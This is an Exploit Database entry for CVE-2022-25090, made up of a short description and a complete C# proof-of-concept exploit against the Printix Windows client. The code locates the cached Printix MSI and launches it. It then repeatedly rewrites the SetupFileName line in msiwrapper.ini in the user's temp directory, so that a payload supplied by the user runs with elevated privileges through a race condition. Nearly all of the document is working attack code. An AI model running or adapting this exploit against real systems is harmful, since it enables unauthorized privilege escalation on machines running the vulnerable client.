Headline
CVE-2022-25090: Offensive Security’s Exploit Database Archive
Printix Secure Cloud Print Management through 1.3.1106.0 creates a temporary temp.ini file in a directory with insecure permissions, leading to privilege escalation because of a race condition.
# Exploit Title: Printix Client 1.3.1106.0 - Privilege Escalation
# Date: 3/2/2022
# Exploit Author: Logan Latvala
# Vendor Homepage: https://printix.net
# Software Link:
https://software.printix.net/client/win/1.3.1106.0/PrintixClientWindows.zip
# Version: <= 1.3.1106.0
# Tested on: Windows 7, Windows 8, Windows 10, Windows 11
# CVE : CVE-2022-25090
# Github for project: https://github.com/ComparedArray/printix-CVE-2022-25090
using System;
using System.Runtime.InteropServices;
using System.Drawing;
using System.Reflection;
using System.Threading;
using System.IO;
using System.Text;
using System.Resources;
using System.Diagnostics;
//Assembly COM for transparent creation of the application.
//End of Assembly COM For Transparent Creation usage.
public class Program
{
//Initiator class for the program, the program starts on the main method.
public static void Main(string[] args)
{
//Console.SetWindowSize(120,30);
//Console.SetBufferSize(120,30);
Console.ForegroundColor = ConsoleColor.Blue;
Console.WriteLine("┌─────────────────────────────────────────────────────────────────────────────────────────────────────────────────────");
Console.WriteLine("├ oo dP dP ");
Console.ForegroundColor = ConsoleColor.Red;
Console.WriteLine("├ 88 88 ");
Console.ForegroundColor = ConsoleColor.Green;
Console.WriteLine("├ dP 88d888b. .d8888b. d888888b d8888P .d8888b. 88d8b.d8b. 88d888b. ");
Console.ForegroundColor = ConsoleColor.Blue;
Console.WriteLine("├ 88 88' `88 88' `88 .d8P' 88 88ooood8 88'`88'`88 88' `88 ");
Console.ForegroundColor = ConsoleColor.Yellow;
Console.WriteLine("├ 88 88 88 88. .88 .Y8P 88 88. ... 88 88 88 88. .88 ");
Console.ForegroundColor = ConsoleColor.Magenta;
Console.WriteLine("├ dP dP dP `88888P8 d888888P dP `88888P' dP dP dP 88Y888P' ");
Console.WriteLine("├ 88 ");
Console.WriteLine("├ dP ");
Console.ForegroundColor = ConsoleColor.Blue;
Console.Write("├ For ");
Console.ForegroundColor = ConsoleColor.Magenta;
Console.Write("Printix ");
Console.ForegroundColor = ConsoleColor.Blue;
Console.Write("Services Designed By Logan Latvala\n");
Console.WriteLine("└─────────────────────────────────────────────────────────────────────────────────────────────────────────────────────");
Thread.Sleep(3000);
string filesH = "";
Console.WriteLine("Drag and drop a payload onto this application for execution.");
try
{
if (args[0]?.Length >0)
{
Console.WriteLine("File Added: " + args[0]);
}
}
catch (Exception e)
{
Console.WriteLine("You\'re missing a file here, please ensure that you drag and drop a payload to execute.\n \n We'll print the error for you right here...\n \n");
Console.ForegroundColor = ConsoleColor.Red;
Console.WriteLine(e);
Console.ReadLine();
Environment.Exit(40);
}
Console.WriteLine("\n We're going to look for your printix installer, one moment...");
string[] installerSearch = Directory.GetFiles(@"C:\windows\installer\", "*.msi", SearchOption.AllDirectories);
double mCheck = 1.00;
string trueInstaller = "";
//Starts to enumerate window's installer directory for an author with the name of printix.
foreach (string path in installerSearch)
{
Console.WriteLine("Searching Files: {0} / {1} Files", mCheck, installerSearch.Length);
Console.WriteLine("Searching Files... " + (Math.Round((mCheck / installerSearch.Length) * 100)) + "% Done.");
if (readFileProperties(path, "Printix"))
{
trueInstaller = path;
Console.WriteLine("We've found your installer, we'll finish enumeration.");
goto MGMA;
}
mCheck++;
}
//Flag for enumeration when the loop needs to exit, since it shouldn't loop infinitely.
MGMA:
if (trueInstaller == "")
{
Console.WriteLine("We can't find your installer, you are not vulnerable.");
Thread.Sleep(2000);
Environment.Exit(12);
}
Console.WriteLine("├─────────────────────────────────────────────────────────────────────────────────────────────────────────────────────");
Console.WriteLine("├ We are starting to enumerate your temporary directory.");
Console.WriteLine("├─────────────────────────────────────────────────────────────────────────────────────────────────────────────────────");
//Start a new thread here for enumeration.
Thread t = new Thread(() => newTempThread(filesH, args));
t.Start();
Process.Start(trueInstaller);
Console.WriteLine("All done.");
Console.ReadLine();
}
public static void newTempThread(string filesH, string[] args)
{
while (true)
{
try
{
//Starts the inheriting process for printix, in which scans for the files and relays their contents.
string[] files = Directory.GetFiles(@"C:\Users\" + Environment.UserName + @"\AppData\Local\Temp\", "msiwrapper.ini", SearchOption.AllDirectories);
if (!string.IsNullOrEmpty(files[0]))
{
foreach (string fl in files)
{
if (!filesH.Contains(fl))
{
//filesH += " " + fl;
string[] fileText = File.ReadAllLines(fl);
int linerc = 0;
foreach (string liners in fileText)
{
if (liners.Contains("SetupFileName"))
{
//Most likely the temporary directory for setup, which presents it properly.
Console.WriteLine("├─────────────────────────────────────────────────────────────────────────────────────────────────────────────────────");
Console.WriteLine("├ " + fl);
fileText[linerc] = @"SetupFileName=" + "\"" + args[0] + "\"";
Console.WriteLine("├ " + fileText[linerc] + "");
Console.WriteLine("├─────────────────────────────────────────────────────────────────────────────────────────────────────────────────────");
Console.WriteLine("│");
filesH += " " + fl;
File.WriteAllText(fl, string.Empty);
File.WriteAllLines(fl, fileText);
}
linerc++;
}
}
}
}
}
catch (Exception e) { Console.WriteLine("There was an error, try re-running the program. \n" + e); Console.ReadLine(); }
Thread.Sleep(20);
}
}
public static bool readFileProperties(string file, string filter)
{
System.Diagnostics.Process process = new System.Diagnostics.Process();
System.Diagnostics.ProcessStartInfo startInfo = new System.Diagnostics.ProcessStartInfo();
startInfo.UseShellExecute = false;
startInfo.RedirectStandardOutput = true;
startInfo.FileName = "CMD.exe";
startInfo.Arguments = "/c PowerShell -Command \"$FilePath='" + file + "'; Write-Host ((New-Object -COMObject Shell.Application).NameSpace((Split-Path -Parent -Path $FilePath))).ParseName((Split-Path -Leaf -Path $FilePath)).ExtendedProperty('System.Author')\"";
process.StartInfo = startInfo;
process.Start();
string output = process.StandardOutput.ReadToEnd();
process.WaitForExit();
if (output.Contains(filter)) { return true; }
else { return false; }
//wmic datafile where Name="F:\\ekojs.txt" get Description,Path,Status,Version
}
}